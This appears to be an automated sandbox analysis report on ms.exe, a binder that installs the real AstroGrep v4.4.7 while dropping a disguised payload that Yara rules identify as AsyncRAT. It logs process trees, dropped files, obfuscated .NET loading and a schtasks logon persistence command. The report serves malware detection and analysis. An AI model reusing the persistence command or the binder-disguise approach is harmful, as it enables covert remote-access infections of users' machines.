                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE'
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\astro-grep.exe C:\Users\user\AppData\Roaming\astro-grep.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\astro-grep.exe 'C:\Users\user\AppData\Roaming\astro-grep.exe'
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' Jump to behavior
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE' Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\astro-grep.exe 'C:\Users\user\AppData\Roaming\astro-grep.exe' Jump to behavior
                            Source: C:\Users\user\Desktop\ms.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: Next >
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: I Agree
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: Next >
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: Next >
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: Next >
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEAutomated click: Install
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.0rc1 Nullsoft Install System v3.0rc1License AgreementPlease review the license terms before installing AstroGrep v4.4.7.Press Page Down to see the rest of the agreement. GNU GENERAL PUBLIC LICENSE Version 2 June 1991 Copyright (C) 1989 1991 Free Software Foundation Inc. 59 Temple Place Suite 330 Boston MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document but changing it is not allowed. Preamble The licenses for most software are designed to take away yourfreedom to share and change it. By contrast the GNU General PublicLicense is intended to guarantee your freedom to share and change freesoftware--to make sure the software is free for all its users. ThisGeneral Public License applies to most of the Free SoftwareFoundation's software and to any other program whose authors commit tousing it. (Some other Free Software Foundation software is covered bythe GNU Library General Public License instead.) You can apply it toyour programs too. When we speak of free software we are referring to freedom notprice. Our General Public Licenses are designed to make sure that youhave the freedom to distribute copies of free software (and charge forthis service if you wish) that you receive source code or can get itif you want it that you can change the software or use pieces of itin new free programs; and that you know you can do these things. To protect your rights we need to make restrictions that forbidanyone to deny you these rights or to ask you to surrender the rights.These restrictions translate to certain responsibilities for you if youdistribute copies of the software or if you modify it. For example if you distribute copies of such a program whethergratis or for a fee you must give the recipients all the rights thatyou have. You must make sure that they too receive or can get thesource code. And you must show them these terms so they know theirrights. We protect your rights with two steps: (1) copyright the software and(2) offer you this license which gives you legal permission to copydistribute and/or modify the software. Also for each author's protection and ours we want to make certainthat everyone understands that there is no warranty for this freesoftware. If the software is modified by someone else and passed on wewant its recipients to know that what they have is not the original sothat any problems introduced by others will not reflect on the originalauthors' reputations. Finally any free program is threatened constantly by softwarepatents. We wish to avoid the danger that redistributors of a freeprogram will individually obtain patent licenses in effect making theprogram proprietary. To prevent this we have made it clear that anypatent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying distribution andmodification follow. GNU GENERAL PUBLIC L
                            Source: ms.exeStatic file information: File size 1068032 > 1048576
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: ms.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Source: ms.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: Re:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb- source: AstroGrep.AdminProcess.exe.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AstroGrep.Common\obj\Release\AstroGrep.Common.pdb source: AstroGrep.Common.dll.5.dr
                            Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: ms.exe
                            Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdbSHA256 source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
                            Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdb source: ICSharpCode.AvalonEdit.dll.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb@ source: libAstroGrep.dll.5.dr
                            Source: Binary string: .exe;.dll;.pdb;.msi;.sys;.ppt;.gif;.jpg;.jpeg;.png;.bmp;.class;.chm+{0}{4}{1}{4}{2}{4}{3} source: AstroGrep.exe.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb source: libAstroGrep.dll.5.dr
                            Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: ms.exe
                            Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdbT source: ICSharpCode.AvalonEdit.dll.5.dr
                            Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdb source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb source: AstroGrep.AdminProcess.exe.5.dr
                            Source: ms.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: ms.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: ms.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: ms.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: ms.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                            Data Obfuscation:

                            barindex
                            .NET source code contains potential unpackerShow sources
                            Source: ASTRO-GREP.EXE.1.dr, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: astro-grep.exe.3.dr, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: 13.2.astro-grep.exe.770000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: 13.0.astro-grep.exe.770000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: 17.2.astro-grep.exe.430000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: 17.0.astro-grep.exe.430000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs.Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A36260 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A36260
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A34485 push ecx; ret 1_2_00A34498
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_005F711F push cs; iretd 3_2_005F7202
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_005F7399 push es; ret 3_2_005F7608
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_005F710D push cs; iretd 3_2_005F7202
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_005F2F81 push eax; ret 3_2_005F2F95
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_005F2A66 push 0000003Eh; retn 0000h3_2_005F2DC0
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_005F4122 push eax; ret 3_2_005F412C
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F2BE10 pushfd ; retf 3_2_00F2BE49
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00772A66 push 0000003Eh; retn 0000h13_2_00772DC0
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00774122 push eax; ret 13_2_0077412C
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_0077711F push cs; iretd 13_2_00777202
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00777399 push es; ret 13_2_00777608
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_00772F81 push eax; ret 13_2_00772F95
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 13_2_0077710D push cs; iretd 13_2_00777202
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 17_2_00432F81 push eax; ret 17_2_00432F95
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 17_2_0043710D push cs; iretd 17_2_00437202
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 17_2_00437399 push es; ret 17_2_00437608
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 17_2_0043711F push cs; iretd 17_2_00437202
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 17_2_00434122 push eax; ret 17_2_0043412C
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeCode function: 17_2_00432A66 push 0000003Eh; retn 0000h17_2_00432DC0
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\nsDialogs.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\StartMenu.dllJump to dropped file
                            Source: C:\Users\user\Desktop\ms.exeFile created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEFile created: C:\Users\user\AppData\Roaming\astro-grep.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\NLog.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\AstroGrep.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\libAstroGrep.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\System.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exeJump to dropped file
                            Source: C:\Users\user\Desktop\ms.exeFile created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\LangDLL.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\Uninstall.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\license.txtJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\readme.txtJump to behavior

                            Boot Survival:

                            barindex
                            Yara detected AsyncRATShow sources
                            Source: Yara matchFile source: ms.exe, type: SAMPLE
                            Source: Yara matchFile source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED
                            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrepJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\AstroGrep.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\Uninstall AstroGrep.lnkJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
